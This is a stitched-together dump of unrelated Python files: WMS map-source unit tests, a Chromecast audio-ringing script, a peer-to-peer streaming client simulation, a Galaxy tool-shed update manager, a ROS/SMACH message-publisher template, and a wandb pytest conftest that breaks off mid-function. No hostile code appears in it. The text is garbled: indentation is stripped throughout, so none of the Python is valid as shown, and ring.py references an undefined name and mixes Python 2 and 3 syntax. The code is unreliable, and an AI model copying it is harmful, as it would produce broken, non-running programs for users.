expected_req = ({'path': r'/service?LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng'
'&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326&styles='
'&VERSION=1.1.1&BBOX=0.0,10.0,10.0,20.0&WIDTH=512'},
{'body': img.read(), 'headers': {'content-type': 'text/plain'}})
with mock_httpd(TEST_SERVER_ADDRESS, [expected_req]):
q = MapQuery((0.0, 10.0, 10.0, 20.0), (512, 512), SRS(4326))
try:
self.source.get_map(q)
except SourceError as e:
assert 'no image returned' in e.args[0]
else:
assert False, 'no SourceError raised'
def test_basic_auth(self):
http_client = HTTPClient(self.req_template.url, username='foo', password='bar@')
self.client.http_client = http_client
def assert_auth(req_handler):
assert 'Authorization' in req_handler.headers
auth_data = req_handler.headers['Authorization'].split()[1]
auth_data = base64.b64decode(auth_data.encode('utf-8')).decode('utf-8')
eq_(auth_data, 'foo:bar@')
return True
expected_req = ({'path': r'/service?LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng'
'&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326'
'&VERSION=1.1.1&BBOX=0.0,10.0,10.0,20.0&WIDTH=512&STYLES=',
'require_basic_auth': True,
'req_assert_function': assert_auth},
{'body': b'no image', 'headers': {'content-type': 'image/png'}})
with mock_httpd(TEST_SERVER_ADDRESS, [expected_req]):
q = MapQuery((0.0, 10.0, 10.0, 20.0), (512, 512), SRS(4326))
self.source.get_map(q)
TESTSERVER_URL = 'http://%s:%d' % TEST_SERVER_ADDRESS
class TestWMSSource(object):
def setup(self):
self.req = WMS111MapRequest(url=TESTSERVER_URL + '/service?map=foo', param={'layers':'foo'})
self.http = MockHTTPClient()
self.wms = WMSClient(self.req, http_client=self.http)
self.source = WMSSource(self.wms, supported_srs=[SRS(4326)],
image_opts=ImageOptions(resampling='bilinear'))
def test_request(self):
req = MapQuery((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326), 'png')
self.source.get_map(req)
eq_(len(self.http.requested), 1)
assert_query_eq(self.http.requested[0],
TESTSERVER_URL+'/service?map=foo&LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng'
'&REQUEST=GetMap&HEIGHT=256&SRS=EPSG%3A4326'
'&VERSION=1.1.1&BBOX=-180.0,-90.0,180.0,90.0&WIDTH=512&STYLES=')
def test_transformed_request(self):
req = MapQuery((-200000, -200000, 200000, 200000), (512, 512), SRS(900913), 'png')
resp = self.source.get_map(req)
eq_(len(self.http.requested), 1)
assert wms_query_eq(self.http.requested[0],
TESTSERVER_URL+'/service?map=foo&LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng'
'&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326'
'&VERSION=1.1.1&WIDTH=512&STYLES='
'&BBOX=-1.79663056824,-1.7963362121,1.79663056824,1.7963362121')
img = resp.as_image()
assert img.mode in ('P', 'RGB')
def test_similar_srs(self):
# request in 3857 and source supports only 900913
# 3857 and 900913 are equal but the client requests must use 900913
self.req = WMS111MapRequest(url=TESTSERVER_URL + '/service?map=foo',
param={'layers':'foo', 'transparent': 'true'})
self.wms = WMSClient(self.req, http_client=self.http)
self.source = WMSSource(self.wms, supported_srs=[SRS(900913)],
image_opts=ImageOptions(resampling='bilinear'))
req = MapQuery((-200000, -200000, 200000, 200000), (512, 512), SRS(3857), 'png')
self.source.get_map(req)
eq_(len(self.http.requested), 1)
assert_query_eq(self.http.requested[0],
TESTSERVER_URL+'/service?map=foo&LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng'
'&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A900913'
'&VERSION=1.1.1&WIDTH=512&STYLES=&transparent=true'
'&BBOX=-200000,-200000,200000,200000')
def test_transformed_request_transparent(self):
self.req = WMS111MapRequest(url=TESTSERVER_URL + '/service?map=foo',
param={'layers':'foo', 'transparent': 'true'})
self.wms = WMSClient(self.req, http_client=self.http)
self.source = WMSSource(self.wms, supported_srs=[SRS(4326)],
image_opts=ImageOptions(resampling='bilinear'))
req = MapQuery((-200000, -200000, 200000, 200000), (512, 512), SRS(900913), 'png')
resp = self.source.get_map(req)
eq_(len(self.http.requested), 1)
assert wms_query_eq(self.http.requested[0],
TESTSERVER_URL+'/service?map=foo&LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng'
'&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326'
'&VERSION=1.1.1&WIDTH=512&STYLES=&transparent=true'
'&BBOX=-1.79663056824,-1.7963362121,1.79663056824,1.7963362121')
img = resp.as_image()
assert img.mode in ('P', 'RGBA')
img = img.convert('RGBA')
eq_(img.getpixel((5, 5))[3], 0)
class MockLayer(object):
def __init__(self):
self.requested = []
def get_map(self, query):
self.requested.append((query.bbox, query.size, query.srs))
class TestResolutionConditionalLayers(object):
def setup(self):
self.low = MockLayer()
self.low.transparent = False #TODO
self.high = MockLayer()
self.layer = ResolutionConditional(self.low, self.high, 10, SRS(900913),
GLOBAL_GEOGRAPHIC_EXTENT)
def test_resolution_low(self):
self.layer.get_map(MapQuery((0, 0, 10000, 10000), (100, 100), SRS(900913)))
assert self.low.requested
assert not self.high.requested
def test_resolution_high(self):
self.layer.get_map(MapQuery((0, 0, 100, 100), (100, 100), SRS(900913)))
assert not self.low.requested
assert self.high.requested
def test_resolution_match(self):
self.layer.get_map(MapQuery((0, 0, 10, 10), (100, 100), SRS(900913)))
assert not self.low.requested
assert self.high.requested
def test_resolution_low_transform(self):
self.layer.get_map(MapQuery((0, 0, 0.1, 0.1), (100, 100), SRS(4326)))
assert self.low.requested
assert not self.high.requested
def test_resolution_high_transform(self):
self.layer.get_map(MapQuery((0, 0, 0.005, 0.005), (100, 100), SRS(4326)))
assert not self.low.requested
assert self.high.requested
class TestSRSConditionalLayers(object):
def setup(self):
self.l4326 = MockLayer()
self.l900913 = MockLayer()
self.l32632 = MockLayer()
self.layer = SRSConditional([
(self.l4326, (SRS('EPSG:4326'),)),
(self.l900913, (SRS('EPSG:900913'), SRS('EPSG:31467'))),
(self.l32632, (SRSConditional.PROJECTED,)),
], GLOBAL_GEOGRAPHIC_EXTENT)
def test_srs_match(self):
assert self.layer._select_layer(SRS(4326)) == self.l4326
assert self.layer._select_layer(SRS(900913)) == self.l900913
assert self.layer._select_layer(SRS(31467)) == self.l900913
def test_srs_match_type(self):
assert self.layer._select_layer(SRS(31466)) == self.l32632
assert self.layer._select_layer(SRS(32633)) == self.l32632
def test_no_match_first_type(self):
assert self.layer._select_layer(SRS(4258)) == self.l4326
class TestNestedConditionalLayers(object):
def setup(self):
self.direct = MockLayer()
self.l900913 = MockLayer()
self.l4326 = MockLayer()
self.layer = ResolutionConditional(
SRSConditional([
(self.l900913, (SRS('EPSG:900913'),)),
(self.l4326, (SRS('EPSG:4326'),))
], GLOBAL_GEOGRAPHIC_EXTENT),
self.direct, 10, SRS(900913), GLOBAL_GEOGRAPHIC_EXTENT
)
def test_resolution_high_900913(self):
self.layer.get_map(MapQuery((0, 0, 100, 100), (100, 100), SRS(900913)))
assert self.direct.requested
def test_resolution_high_4326(self):
self.layer.get_map(MapQuery((0, 0, 0.0001, 0.0001), (100, 100), SRS(4326)))
assert self.direct.requested
def test_resolution_low_4326(self):
self.layer.get_map(MapQuery((0, 0, 10, 10), (100, 100), SRS(4326)))
assert self.l4326.requested
def test_resolution_low_projected(self):
self.layer.get_map(MapQuery((0, 0, 10000, 10000), (100, 100), SRS(31467)))
assert self.l900913.requested
|
ring.py
|
#!/usr/bin/env python
import sys, getopt
import time
import pychromecast
import threading
def playAudio(cast, mediaList, mediaformat, repeat):
try:
cast.wait()
mc = cast.media_controller;
mc.stop();
print(cast.device)
for ii in xrange(repeat):
if repeat != 1:
print ii
for media in mediaList:
mc.play_media(media, mediaformat);
attempts = 10
while attempts > 0 and mc.status.player_state in [u'UNKNOWN', u'IDLE']:
print(mc.status)
attempts -= 1
time.sleep(1)
attempts = 30
while attempts > 0 and mc.status.player_state in [u'PLAYING', u'BUFFERING']:
print(mc.status)
time.sleep(1)
except KeyboardInterrupt:
thread.interrupt_main();
def runThreads(threads):
for thread in threads:
thread.start();
for thread in threads:
thread.join();
def ring(device, mediaList, mediaformat, repeat):
if device == None:
# All available devices
devices = pychromecast.get_chromecasts_as_dict().values()
else:
cast = None;
sleep = 0
attempts = 10
while attempts > 0 and cast == None:
if sleep > 0:
time.sleep(sleep)
print("Retrying " + device + "...");
cast = pychromecast.get_chromecast(friendly_name=device)
sleep = 1
attempts -= 1
# wrap the resolved cast in a list so the thread setup below gets a device list
devices = [cast]
threads = map((lambda cast: threading.Thread(target = playAudio, args = [cast, mediaList, mediaformat, repeat])), devices);
runThreads(threads);
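# Example invocation (illustration only; the device name and media URL below are
# placeholders, not values from this repository):
#   python ring.py -d "Living Room speaker" -m audio/mp3 -r 2 http://example.com/doorbell.mp3
# Omitting -d plays the media on every Chromecast that pychromecast discovers.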
if __name__ == "__main__":
device=None
mediaformat='video/mp4'
repeat=1
myopts, args = getopt.getopt(sys.argv[1:], "d:m:r:");
for o, a in myopts:
if o == '-d':
device = a
elif o == '-m':
mediaformat = a
elif o == '-r':
repeat = int(a)
devices = None
ring(device, args, mediaformat, repeat);
|
p2p_client.py
|
from threading import Thread
import time, uuid
import numpy as np
from ..utils.flags import DEBUG
class VCROperation:
def __init__(self, type, speed, offset) -> None:
self.type = type
self.speed = speed
self.seek_offset = offset
@property
def is_forward(self):
return self.type == "forward"
@property
def is_rewind(self):
return self.type == "rewind"
@property
def is_seek(self):
return self.type == "seek"
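# Minimal usage sketch (illustration only; the only meaningful type strings are
# "forward", "rewind" and "seek", matching the properties above):
#   op = VCROperation(type="seek", speed=1, offset=42)
#   assert op.is_seek and not op.is_rewind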
class Client:
"""A streaming client node in the P2P overlay (a skip list), with a local playback buffer and optional VCR-style operations."""
def __init__(self, playback_offset = 0.0, buffer_size = 10, total_stream_length = 100, vcr_operation = None, vcr_operation_percent_ofstream = 0):
self._id = uuid.uuid4()
self._vcr_operation = vcr_operation
self._vcr_operation_percent_ofstream = vcr_operation_percent_ofstream
self._total_stream_length = total_stream_length
self._playback_offset = playback_offset
self._buffer_size = buffer_size
self._buffer = (playback_offset, playback_offset+buffer_size)
self._speed = 1
self._is_playing = False
self._is_forward = True
self._play_thread = None
self._buffering_thread = None
self._misses = {}
self._hits = {}
self._vcr_data = {}
self._buffering_duration = 0.01
self._tik_duration = 0.005
self.time = 0
self._overlay = None  # set when the client joins an overlay via join()
def __repr__(self) -> str:
return str(self._id)
def __eq__(self, other):
if not isinstance(other, Client):
# don't attempt to compare against unrelated types
return NotImplemented
return self._id == other._id
def __str__(self):
msg = "rewind"
if self._is_forward:
msg = "forward"
return "{}\nwith buffer {}\nplaying {}: {}\nat speed {}".format(self._id, self._buffer, msg, self._playback_offset, self._speed)
def start_timer(self):
def _run():
while True:
time.sleep(self._tik_duration)
self.time+=1
self._timer_thread = Thread(target=_run, daemon=True)
self._timer_thread.start()
def _play(self):
while self._is_playing:
# Hit / Miss bookkeeping - SMR
# print("crack")
if self._playback_offset > self._buffer[1] or self._playback_offset < self._buffer[0]:
self._misses[self.time] = self._misses.get(self.time,0) + 1
self.random_seek(self._playback_offset)
continue
else:
self._hits[self.time] = self._hits.get(self.time,0) + 1
# mimic the play action
if DEBUG:
print(self)
# Handling VCR Operations
self._handle_vcr_op_if_needed()
# Advance to next segment
if self._is_forward:
self._playback_offset += 1 * self._speed
else:
self._playback_offset -= 1 * self._speed
# Validate end/beginning of stream
if self._playback_offset >= self._total_stream_length:
if DEBUG:
print("Got to END of the stream {}".format(self._playback_offset))
self._is_playing = False
break
if self._playback_offset <= 0:
if DEBUG:
print("Got to BEGINNING of the stream {}".format(self._playback_offset))
self._is_playing = False
break
# Validate end of local buffer, i.e needs to random seek
if self._buffer[1] <= self._playback_offset and self._is_forward:
self.random_seek(self._playback_offset)
if DEBUG:
print("forward: end of buffer need to go to next node")
if self._playback_offset <= self._buffer[0] and not self._is_forward:
self.random_seek(self._playback_offset)
if DEBUG:
print("rewind: end of buffer need to go to prev node")
def _handle_vcr_op_if_needed(self):
# Check if operation exists
if self._vcr_operation == None:
return
# Only apply the operation once playback has reached the configured percentage of the stream
current_percentage_done = self._playback_offset / self._total_stream_length
if current_percentage_done < self._vcr_operation_percent_ofstream:
return
# Handle by type
self._speed = self._vcr_operation.speed
if self._vcr_operation.is_forward:
self._speed = self._vcr_operation.speed
self._is_forward = True
elif self._vcr_operation.is_rewind:
self._speed = self._vcr_operation.speed
self._is_forward = False
elif self._vcr_operation.is_seek:
self._playback_offset = self._vcr_operation.seek_offset
# handled, no need for operation no mo (:
self._vcr_operation = None
def _fetch_buffer(self):
# Sleep - mimic async buffering
time.sleep(self._buffering_duration)
# We need to fetch more buffer forward
if self._playback_offset > self._buffer[-1]:
begin = self._playback_offset
end = min(self._playback_offset + self._buffer_size, self._total_stream_length)
if DEBUG:
print("Buffering forward from {} to {}".format(begin, end))
self._buffer = (begin, end)
# We need to fetch more buffer rewind
if self._playback_offset < self._buffer[0]:
begin = self._playback_offset
end = max(0, self._buffer[0] - self._buffer_size)
if end < begin:
begin, end = end, begin
if DEBUG:
print("Buffering rewind from {} to {}".format(begin, end))
self._buffer = (begin, end)
def play(self):
assert(self._overlay != None)
self._is_playing = True
if self._play_thread:
raise Exception("Trying to play while playing thread is already running")
self._play_thread = Thread(target=self._play, daemon=True)
if DEBUG:
print("start playing")
self._play_thread.start()
# Network operations
def join(self, overlay): # O(log(N/log(N)))
self._overlay = overlay
overlay.join(self)
# Make sure buffer is updated - i.e simulate ask from server or nearby nodes
if self._playback_offset not in self._buffer:
# Buffering on a different thread to give the async illusion
self._buffering_thread = Thread(target=self._fetch_buffer, daemon=True)
self._buffering_thread.start()
def leave(self): # O(1)
assert(self._overlay != None)
# Before leaving notify the neighbors so they can reconnect
self._overlay.leave(self)
self._overlay = None
# VCR like operations
def pause(self):
assert(self._overlay != None)
if not self._is_playing:
return
self._is_playing = False
# Nothing to do, only if the buffer overflows we leave
# We don't support buffer overflow
def resume(self):
assert(self._overlay != None)
# Make sure we are not already playing
if self._is_playing:
return
# Enable playing
self._is_playing = True
# Only if we are not part of the overlay we shall re-join
if self._id not in self._overlay._clients:
self._overlay.join(self)
# Start playing
self.play()
def random_seek(self, new_offset):
assert(self._overlay != None)
overlay = self._overlay
self.leave()
self._playback_offset = new_offset # Set new offset
self.join(overlay)
# Not supported yet
def forward(self, speed):
assert(self._overlay != None)
self._speed = speed
self._is_playing = True
def rewind(self, speed):
assert(self._overlay != None)
self._speed = speed
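# Minimal usage sketch (illustration only; `overlay` is a hypothetical skip-list
# overlay object that implements join(client) and leave(client) and exposes a
# _clients dict, as assumed by join()/resume() above):
#   client = Client(playback_offset=0.0, buffer_size=10, total_stream_length=100)
#   client.start_timer()
#   client.join(overlay)
#   client.play()        # plays on a daemon thread until the end of the stream
#   client.pause()
#   client.leave()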
|
update_repository_manager.py
|
"""
Determine if installed tool shed repositories have updates available in their respective tool sheds.
"""
import logging
import threading
from sqlalchemy import false
from galaxy import util
from galaxy.tool_shed.util.repository_util import get_tool_shed_status_for_installed_repository
from galaxy.tool_shed.util.shed_util_common import clean_dependency_relationships
from galaxy.util.tool_shed.common_util import get_tool_shed_url_from_tool_shed_registry
from galaxy.util.tool_shed.encoding_util import tool_shed_decode
log = logging.getLogger(__name__)
class UpdateRepositoryManager:
def __init__(self, app):
self.app = app
self.context = self.app.install_model.context
# Ideally only one Galaxy server process should be able to check for repository updates.
if self.app.config.enable_tool_shed_check:
self.running = True
self.sleeper = Sleeper()
self.restarter = threading.Thread(target=self.__restarter)
self.restarter.daemon = True
self.app.application_stack.register_postfork_function(self.restarter.start)
self.seconds_to_sleep = int(app.config.hours_between_check * 3600)
def get_update_to_changeset_revision_and_ctx_rev(self, repository):
"""Return the changeset revision hash to which the repository can be updated."""
changeset_revision_dict = {}
tool_shed_url = get_tool_shed_url_from_tool_shed_registry(self.app, str(repository.tool_shed))
params = dict(name=str(repository.name),
owner=str(repository.owner),
changeset_revision=str(repository.installed_changeset_revision))
pathspec = ['repository', 'get_changeset_revision_and_ctx_rev']
try:
encoded_update_dict = util.url_get(tool_shed_url, auth=self.app.tool_shed_registry.url_auth(tool_shed_url), pathspec=pathspec, params=params)
if encoded_update_dict:
update_dict = tool_shed_decode(encoded_update_dict)
includes_data_managers = update_dict.get('includes_data_managers', False)
includes_datatypes = update_dict.get('includes_datatypes', False)
includes_tools = update_dict.get('includes_tools', False)
includes_tools_for_display_in_tool_panel = update_dict.get('includes_tools_for_display_in_tool_panel', False)
includes_tool_dependencies = update_dict.get('includes_tool_dependencies', False)
includes_workflows = update_dict.get('includes_workflows', False)
has_repository_dependencies = update_dict.get('has_repository_dependencies', False)
has_repository_dependencies_only_if_compiling_contained_td = update_dict.get('has_repository_dependencies_only_if_compiling_contained_td', False)
changeset_revision = update_dict.get('changeset_revision', None)
ctx_rev = update_dict.get('ctx_rev', None)
changeset_revision_dict['includes_data_managers'] = includes_data_managers
changeset_revision_dict['includes_datatypes'] = includes_datatypes
changeset_revision_dict['includes_tools'] = includes_tools
changeset_revision_dict['includes_tools_for_display_in_tool_panel'] = includes_tools_for_display_in_tool_panel
changeset_revision_dict['includes_tool_dependencies'] = includes_tool_dependencies
changeset_revision_dict['includes_workflows'] = includes_workflows
changeset_revision_dict['has_repository_dependencies'] = has_repository_dependencies
changeset_revision_dict['has_repository_dependencies_only_if_compiling_contained_td'] = has_repository_dependencies_only_if_compiling_contained_td
changeset_revision_dict['changeset_revision'] = changeset_revision
changeset_revision_dict['ctx_rev'] = ctx_rev
except Exception as e:
log.debug(f"Error getting change set revision for update from the tool shed for repository '{repository.name}': {str(e)}")
changeset_revision_dict['includes_data_managers'] = False
changeset_revision_dict['includes_datatypes'] = False
changeset_revision_dict['includes_tools'] = False
changeset_revision_dict['includes_tools_for_display_in_tool_panel'] = False
changeset_revision_dict['includes_tool_dependencies'] = False
changeset_revision_dict['includes_workflows'] = False
changeset_revision_dict['has_repository_dependencies'] = False
changeset_revision_dict['has_repository_dependencies_only_if_compiling_contained_td'] = False
changeset_revision_dict['changeset_revision'] = None
changeset_revision_dict['ctx_rev'] = None
return changeset_revision_dict
def __restarter(self):
log.info('Update repository manager restarter starting up...')
while self.running:
# Make a call to the Tool Shed for each installed repository to get the latest
# status information in the Tool Shed for the repository. This information includes
# items like newer installable repository revisions, current revision updates, whether
# the repository revision is the latest installable revision, and whether the repository
# has been deprecated in the Tool Shed.
for repository in self.context.query(self.app.install_model.ToolShedRepository) \
.filter(self.app.install_model.ToolShedRepository.table.c.deleted == false()):
tool_shed_status_dict = get_tool_shed_status_for_installed_repository(self.app, repository)
if tool_shed_status_dict:
if tool_shed_status_dict != repository.tool_shed_status:
repository.tool_shed_status = tool_shed_status_dict
self.context.flush()
else:
# The received tool_shed_status_dict is an empty dictionary, so coerce to None.
tool_shed_status_dict = None
if tool_shed_status_dict != repository.tool_shed_status:
repository.tool_shed_status = tool_shed_status_dict
self.context.flush()
self.sleeper.sleep(self.seconds_to_sleep)
log.info('Update repository manager restarter shutting down...')
def shutdown(self):
if self.app.config.enable_tool_shed_check:
self.running = False
self.sleeper.wake()
def update_repository_record(self, repository, updated_metadata_dict, updated_changeset_revision, updated_ctx_rev):
"""
Update a tool_shed_repository database record with new information retrieved from the
Tool Shed. This happens when updating an installed repository to a new changeset revision.
"""
repository.metadata = updated_metadata_dict
tool_shed_url = get_tool_shed_url_from_tool_shed_registry(self.app, repository.tool_shed)
clean_dependency_relationships(self.app, updated_metadata_dict, repository, tool_shed_url)
# Update the repository.changeset_revision column in the database.
repository.changeset_revision = updated_changeset_revision
repository.ctx_rev = updated_ctx_rev
# Update the repository.tool_shed_status column in the database.
tool_shed_status_dict = get_tool_shed_status_for_installed_repository(self.app, repository)
if tool_shed_status_dict:
repository.tool_shed_status = tool_shed_status_dict
else:
repository.tool_shed_status = None
self.app.install_model.context.add(repository)
self.app.install_model.context.flush()
self.app.install_model.context.refresh(repository)
return repository
class Sleeper:
"""
Provides a 'sleep' method that sleeps for a number of seconds *unless* the notify method
is called (from a different thread).
"""
def __init__(self):
self.condition = threading.Condition()
def sleep(self, seconds):
self.condition.acquire()
self.condition.wait(seconds)
self.condition.release()
def wake(self):
self.condition.acquire()
self.condition.notify()
self.condition.release()
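# Minimal usage sketch for Sleeper (illustration only):
#   sleeper = Sleeper()
#   # in a worker thread: block for up to an hour, but wake early if notified
#   sleeper.sleep(3600)
#   # in another thread, e.g. during shutdown:
#   sleeper.wake()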
|
MsgPublisher.tpl.py
|
{% block meta %}
name: MsgPublisher
description:
SMACH template that provides a MsgPublisher helper class for
PublishMsgState.
language: Python
framework: SMACH
type: None
tags: [core]
includes: []
extends: []
variables: []
input_keys: []
output_keys: []
{% endblock meta %}
{% from "Utils.tpl.py" import import_module, from_import %}
{% block imports %}
{{ import_module(defined_headers, 'rospy') }}
{{ import_module(defined_headers, 'threading') }}
{% endblock imports %}
{% block class_defs %}
{% if 'class_MsgPublisher' not in defined_headers %}
class MsgPublisher(object):
"""
Helper that publishes messages on one or more topics, each from its own
background thread, until stop() or stop_all() is called.
"""
def __init__(self):
# A dict of message publishers indexed by topic
self._pubs = dict()
# A dict of messages indexed by topic
self._msgs = dict()
# A dict of callbacks indexed by topic
self._callbacks = dict()
# A dict of message publication rates indexed by topic
self._pub_rates = dict()
# A dict of message publisher threads indexed by topic
self._pub_threads = dict()
# A dict of message publisher stop flags indexed by topic
self._stop_flags = dict()
# Length of timeout (in seconds) for waiting for the threads to finish
# publishing before forcibly unpublishing.
self._unpublish_timeout = 10.0
def _run_pub_thread(self, topic):
r = rospy.Rate(self._pub_rates[topic])
while not self._stop_flags[topic]:
# Apply callback to message
if self._callbacks[topic]:
try:
self._msgs[topic] = self._callbacks[topic](self._msgs[topic])
except Exception as e:
rospy.logerr('Error when applying callback to message being published on topic {}: {}'.format(topic, repr(e)))
# Publish message
try:
self._pubs[topic].publish(self._msgs[topic])
except Exception as e:
rospy.logerr('Error while publishing to topic {}: {}'.format(topic, repr(e)))
r.sleep()
self._unpublish(topic)
def _unpublish(self, topic):
try:
self._pubs[topic].unregister()
except Exception as e:
rospy.logerr('Failed to unregister publisher of topic {}: {}'.format(topic, repr(e)))
raise
del self._pubs[topic]
del self._msgs[topic]
del self._callbacks[topic]
del self._pub_rates[topic]
def start(self, msg, topic, rate, frame_id=None, callback=None):
# Set the message publisher stopping flag
self._stop_flags[topic] = False
# Save the message
self._msgs[topic] = msg
# Save the message publication rate
self._pub_rates[topic] = rate
# Use frame_id if specified
if frame_id:
try:
assert(isinstance(frame_id, str))
self._msgs[topic].header.frame_id = frame_id
except Exception as e:
rospy.logwarn('Failed to add specified frame_id {} to message for publication on topic {}: {}'.format(frame_id, topic, repr(e)))
# Use callback if specified
if callback:
try:
assert(callable(callback))
self._callbacks[topic] = callback
except Exception as e:
rospy.logwarn('Failed to add specified callback {} to publisher of topic {}: {}'.format(callback, topic, repr(e)))
self._callbacks[topic] = None
else:
self._callbacks[topic] = None
# Add publisher
try:
# queue_size is required by current rospy; 10 is an arbitrary default here
self._pubs[topic] = rospy.Publisher(topic, type(self._msgs[topic]), queue_size=10)
except Exception as e:
del self._pub_rates[topic]
del self._msgs[topic]
rospy.logwarn('Failed to add publisher for topic {}: {}'.format(topic, repr(e)))
return 'aborted'
# Spin up the message publication thread
self._pub_threads[topic] = threading.Thread(target=self._run_pub_thread, args=[topic])
self._pub_threads[topic].start()
return 'succeeded'
def stop(self, topic):
# Signal thread to stop publishing
self._stop_flags[topic] = True
# Wait for the topic to be unpublished
t = rospy.get_time()
r = rospy.Rate(self._pub_rates[topic])
while topic in list(self._pubs.keys()):
if rospy.get_time() - t < self._unpublish_timeout:
r.sleep()
else:
break
else:
return 'succeeded'
# If the publisher is still running, issue a warning and attempt forced unpublish.
rospy.logwarn('Warning: timeout exceeded for stopping publisher thread for topic {}. Attempting forced stop...'.format(topic))
try:
self._unpublish(topic)
except Exception as e:
rospy.logerr('Error during forced stop of publisher of topic {}: {}'.format(topic, repr(e)))
return 'aborted'
return 'succeeded'
def stop_all(self):
# Stop all current publishers
# copy the keys: stop() removes entries from self._pubs while we iterate
for topic in list(self._pubs.keys()):
if self.stop(topic) != 'succeeded':
return 'aborted'
return 'succeeded'
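# Minimal usage sketch (illustration only; the message, topic and rate are
# placeholders, not values defined by this template):
#   pub = MsgPublisher()
#   pub.start(std_msgs.msg.String(data='hello'), '/chatter', rate=10)
#   ...
#   pub.stop('/chatter')   # or pub.stop_all() to stop every topic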
{% do defined_headers.append('class_MsgPublisher') %}{% endif %}
{% endblock class_defs %}
|
conftest.py
|
import requests_mock
import os
from click.testing import CliRunner
import pytest
from wandb.history import History
from tests.api_mocks import *
import wandb
from wandb import wandb_run
from wandb.apis import InternalApi
import six
import json
import sys
import time
import threading
import logging
from multiprocessing import Process
from vcr.request import Request
import requests
from wandb import wandb_socket
from wandb import env
from wandb import util
from wandb.wandb_run import Run
from tests import utils
from tests.mock_server import create_app
import socket
def pytest_runtest_setup(item):
wandb.reset_env()
wandb.uninit()
global_settings = os.path.expanduser("~/.config/wandb/settings")
if os.path.exists(global_settings):
try:
os.remove(global_settings)
except OSError:
pass
# This is used to find tests that are leaking outside of tmp directories
os.environ["WANDB_DESCRIPTION"] = item.parent.name + "#" + item.name
def request_repr(self):
try:
body = json.loads(self.body)
query = body.get("query") or "no_query"
render = query.split("(")[0].split("\n")[0] + " - vars: " + str(body.get("variables", {}).get("files", {}))
except (ValueError, TypeError):
render = "BINARY"
return "({}) {} - {}".format(self.method, self.uri, render)
Request.__repr__ = request_repr
# To enable VCR logging uncomment below
#logging.basicConfig() # you need to initialize logging, otherwise you will not see anything from vcrpy
#vcr_log = logging.getLogger("vcr")
#vcr_log.setLevel(logging.INFO)
@pytest.fixture(scope='module')
def vcr_config():
def replace_body(request):
if "storage.googleapis.com" in request.uri:
request.body = "BINARY DATA"
elif "/file_stream" in request.uri:
request.body = json.dumps({"files": list(json.loads(request.body).get("files", {}).keys())})
return request
def replace_response_body(response, *args):
"""Remove gzip response from pypi"""
if response["headers"].get("Access-Control-Expose-Headers") == ['X-PyPI-Last-Serial']:
if response["headers"].get("Content-Encoding"):
del response["headers"]["Content-Encoding"]
response["body"]["string"] = '{"info":{"version": "%s"}}' % wandb.__version__
return response
return {
# Replace the Authorization request header with "DUMMY" in cassettes
"filter_headers": [('authorization', 'DUMMY')],
"match_on": ['method', 'uri', 'query', 'graphql'],
"before_record": replace_body,
"before_record_response": replace_response_body,
}
@pytest.fixture(scope='module')
def vcr(vcr):
def vcr_graphql_matcher(r1, r2):
if "/graphql" in r1.uri and "/graphql" in r2.uri:
body1 = json.loads(r1.body.decode("utf-8"))
body2 = json.loads(r2.body.decode("utf-8"))
return body1["query"].strip() == body2["query"].strip()
elif "/file_stream" in r1.uri and "/file_stream" in r2.uri:
body1 = json.loads(r1.body.decode("utf-8"))
body2 = json.loads(r2.body.decode("utf-8"))
return body1["files"] == body2["files"]
vcr.register_matcher('graphql', vcr_graphql_matcher)
return vcr
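# Usage sketch (illustration only, assuming the pytest-vcr conventions this suite
# relies on): a test opts in with the vcr marker and matching GraphQL/file_stream
# requests are replayed from cassettes, e.g.
#   @pytest.mark.vcr()
#   def test_something(wandb_init_run):
#       ...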
@pytest.fixture
def local_netrc(monkeypatch):
with CliRunner().isolated_filesystem():
# TODO: this seems overkill...
origexpand = os.path.expanduser
def expand(path):
return os.path.realpath("netrc") if "netrc" in path else origexpand(path)
monkeypatch.setattr(os.path, "expanduser", expand)
yield
@pytest.fixture
def history():
with CliRunner().isolated_filesystem():
yield Run().history
@pytest.fixture
def wandb_init_run(request, tmpdir, request_mocker, mock_server, monkeypatch, mocker, capsys, local_netrc):
"""Fixture that calls wandb.init(), yields a run (or an exception) that
gets created, then cleans up afterward. This is meant to test the logic
in wandb.init, it should generally not spawn a run_manager. If you need
to test run_manager logic use that fixture.
"""
# save the environment so we can restore it later. pytest
# may actually do this itself. didn't check.
orig_environ = dict(os.environ)
orig_namespace = None
run = None
# Reset the tensorboard and pytest state
wandb.tensorboard.reset_state()
wandb._global_watch_idx = 0
try:
with CliRunner().isolated_filesystem():
if request.node.get_closest_marker('jupyter'):
def fake_ipython():
class Jupyter(object):
__module__ = "jupyter"
def __init__(self):
class Hook(object):
def register(self, what, where):
pass
class Pub(object):
def publish(self, **kwargs):
pass
class Hist(object):
def get_range(self, **kwargs):
return [[None, 1, ('#source code', None)]]
self.events = Hook()
self.display_pub = Pub()
self.history_manager = Hist()
def register_magics(self, magic):
pass
return Jupyter()
wandb.get_ipython = fake_ipython
wandb.jupyter.get_ipython = fake_ipython
# no i/o wrapping - it breaks pytest
os.environ['WANDB_MODE'] = 'clirun'
if request.node.get_closest_marker('headless'):
mocker.patch('subprocess.Popen')
else:
def mock_headless(run, cloud=True):
print("_init_headless called with cloud=%s" % cloud)
mocker.patch('wandb._init_headless', mock_headless)
if not request.node.get_closest_marker('unconfigured'):
os.environ['WANDB_API_KEY'] = 'test'
os.environ['WANDB_ENTITY'] = 'test'
os.environ['WANDB_PROJECT'] = 'unit-test-project'
else:
# when unconfigured we enable run mode to test missing creds
os.environ['WANDB_MODE'] = 'run'
monkeypatch.setattr('wandb.apis.InternalApi.api_key', None)
monkeypatch.setattr(
'getpass.getpass', lambda x: "0123456789012345678901234567890123456789")
assert InternalApi().api_key == None
os.environ['WANDB_RUN_DIR'] = str(tmpdir)
if request.node.get_closest_marker('silent'):
os.environ['WANDB_SILENT'] = "true"
orig_namespace = vars(wandb)
assert wandb.run is None
# Mock out run_manager, we add it to run to access state in tests
orig_rm = wandb.run_manager.RunManager
